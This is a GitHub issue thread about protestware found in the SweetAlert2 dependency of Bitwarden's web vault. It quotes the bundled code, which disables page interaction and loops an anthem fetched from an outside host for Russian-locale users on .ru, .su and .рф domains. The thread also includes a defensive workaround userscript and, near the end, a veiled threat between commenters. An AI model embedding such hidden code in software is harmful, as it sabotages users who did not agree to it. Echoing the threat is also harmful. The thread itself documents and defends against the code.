Closed DarkCat09 closed 1 year ago
I've read the conversation in https://github.com/bitwarden/clients/pull/5011 and the related issue https://github.com/bitwarden/clients/issues/4540, and now I don't think that developers will do anything...
Hi @DarkCat09,
This has been escalated for further investigation. If you have more information that can help us, please add it below.
Thanks!
.ru
, .su
, and .рф
domain zones and playing Ukrainian national anthem@atjbramley,
Thanks for your quick response.
If you are not going to use another JavaScript library, take a look at https://github.com/lofcz/sweetalert2-neutral
Hi @DarkCat09,
I've looked into the issue, and Bitwarden does not use a vulnerable version of SweetAlert2. We've intentionally not upgraded to newer major versions to avoid this issue.
I took a quick look at VaultWarden's build process, and they run npm audit --fix
which seems to bump SweetAlert2 to a new major version. Since Bitwarden does not provide support for unofficial builds this issue will be closed.
@Hinton,
Really? I've checked the latest web vault release now:
$ wget https://github.com/bitwarden/clients/releases/download/web-v2023.5.1/web-2023.5.1-selfhosted-open-source.zip
...
2023-07-06 12:02:55 (101 KB/s) - «web-2023.5.1-selfhosted-open-source.zip» сохранён [10593568/10593568]
$ 7z x web-2023.5.1-selfhosted-open-source.zip
7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=ru_RU.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs x64)
Scanning the drive for archives:
1 file, 10593568 bytes (11 MiB)
Extracting archive: web-2023.5.1-selfhosted-open-source.zip
--
Path = web-2023.5.1-selfhosted-open-source.zip
Type = zip
Physical Size = 10593568
Everything is Ok
Folders: 75
Files: 226
Size: 41831531
Compressed: 10593568
$ cd build
$ grep -ior ukraina.mp3 .
./app/vendor.d6556a6abd8a862bb28c.js.map:Ukraina.mp3
./app/vendor.d6556a6abd8a862bb28c.js:Ukraina.mp3
$ more ./app/vendor.d6556a6abd8a862bb28c.js
/Ukraina.mp3 (slash is "find" command)
if("undefined"!=typeof window&&/^ru\b/.test(navigator.language)&&location.host.match(/\.(ru|su|xn--p1ai)$/)){var pi=new Date,mi=localStorage.getItem("swal-initiation");mi?(pi.getTime()-Date.parse(mi))/864e5>3&&setTimeout((function(){document.body.style.pointerEvents="none";var e=document.createElement("audio");e.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",e.loop=!0,document.body.appendChild(e),setTimeout((function(){e.play().catch((function(){}))}),2500)}),500)
Maybe your CI/CD system also updates packages?
Here is the SHA256 sum of the release file I downloaded:
d918f0f8cbddc398353dddaac7821322fba4f33c722c8821a8c9132e6df53f57 web-2023.5.1-selfhosted-open-source.zip
SweetAlert2 10.16.1 specified in package.json was released before 24.02.2022, so there should be no malicious code. But there is (at least, in the pre-built web vault).
GitHub Actions build-web config:
Build command in apps/web/package.json:
That's weird. Where CI updates packages?
I took a second look and you are right, it seems the dependency was updated to a newer patch release recently which seems to bring in this issue. We're partially in the process of replacing SweetAlert2 with our own dialogs already though.
Any progress on fixing this vulnerability?
@Hinton, I'm sorry to bother you, but could I ask if there is any progress?
I still see swal2 in package(-lock).json, grep
still finds "ukraina.mp3" in the latest web vault build.
If rewriting UI to custom dialogs takes much time, why don't use npm i sweetalert2-neutral
for now?
I moved to KeePassXC + Syncthing, because I didn't want to wait for the fix and realized that serverless password storage is more secure. But I just want to be sure that Bitwarden does not support neither Ukraine, nor Russia, so I'll be glad to hear about updates on removing sweetalert2.
Upd: thanks a lot for reacting. I've subscribed to PR discussion.
It has taken 2 months to remove MIR options (request: https://github.com/bitwarden/clients/pull/5011 and PR: https://github.com/bitwarden/clients/issues/4540) 2 months has been passed for this issue to remove Ukraine anthem 🤞🏼
@DarkCat09 Thank you for digging into this Andrey! :3
Here's the formatted version of the snippet in question as of v2023.5.1:
if ("undefined" != typeof window && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|xn--p1ai)$/)) {
var pi = new Date,
mi = localStorage.getItem("swal-initiation");
// If three hours have passed since SweetAlert2 has first seen the origin...
// https://developer.mozilla.org/docs/Glossary/Origin
mi ? (pi.getTime() - Date.parse(mi)) / 864e5 > 3 && setTimeout((function() {
document.body.style.pointerEvents = "none";
var e = document.createElement("audio");
e.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",
e.loop = !0,
document.body.appendChild(e), setTimeout((function() {
e.play().catch((function() {}))
}), 2500)
}), 500) : /* ... */ null
}
Compare to: https://github.com/sweetalert2/sweetalert2/blob/v11.6.13/src/SweetAlert.js#L261-L281
Gist: https://gist.github.com/yanalunaterra/1adaf6173f13875cbd49303009f4ef31
Does it mean that workaround is to block flag-gimn.ru domain completely and ignore console errors and missing alerts?
@sguryev, also, you need to start a script that reverses pointerEvents = "none"
, i.e.
window.addEventListener('load', () => { document.body.style.pointerEvents = "auto" })
But I hope this will be fixed soon.
@sguryev Спробуй:
// ==UserScript==
// @name SweetAlert2 protestware workaround
// @version 1
// @match *://*.ru/*
// @match *://*.su/*
// @match *://*.by/*
// @match *://*.xn--p1ai/*
// ==/UserScript==
// Tested against v11.7.27:
// https://github.com/sweetalert2/sweetalert2/blob/v11.7.27/src/SweetAlert.js#L261-L285
const observer = new MutationObserver(function(records, _) {
for (const record of records) {
for (const node of record.addedNodes) {
if (node.src === "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3") {
document.body.style.removeProperty("pointer-events");
node.pause();
node.src = "";
node.remove();
}
}
}
});
observer.observe(document.body, { childList: true });
Ось як користуватися: https://github.com/awesome-scripts/awesome-userscripts#how-to-use
(;
We're in the final stages of getting this dependency fully removed for the September release.
Thank you for years of using my small plugin ❤️ and apologies for bringing this hassle to your project.
I hope to see one day that Bitwarden Inc. stands with Ukraine (something similar to this). Not restricting your service to ruzzians might negatively affect the reputation of the business.
Sincerely, happy Bitwarden user, this repo contributor, and the author of @sweetalert2
@limonte
Not restricting your service to ruzzians might negatively affect the reputation of the business.
Is it the threat?
Not restricting your service to ruzzians might negatively affect the reputation of the business.
Look around when you walk in the evenings.
Steps To Reproduce
SweetAlert2 loads ukraine anthem if browser language is set to Russian or web vault is hosted on RU/РФ domain.
It is used as dependency: https://github.com/bitwarden/clients/blob/master/package.json#L198
See also https://github.com/dani-garcia/bw_web_builds/issues/132
I've downloaded the latest release of web vault and checked with grep:
Expected Result
Expected Result: no politics.
Actual Result
Actual Result: error while loading ukraine anthem in DevTools console.
Screenshots or Videos
No response
Additional Context
No response
Operating System
Linux
Operating System Version
No response
Web Browser
Firefox
Browser Version
No response
Build Version
v2023.5.1
Issue Tracking Info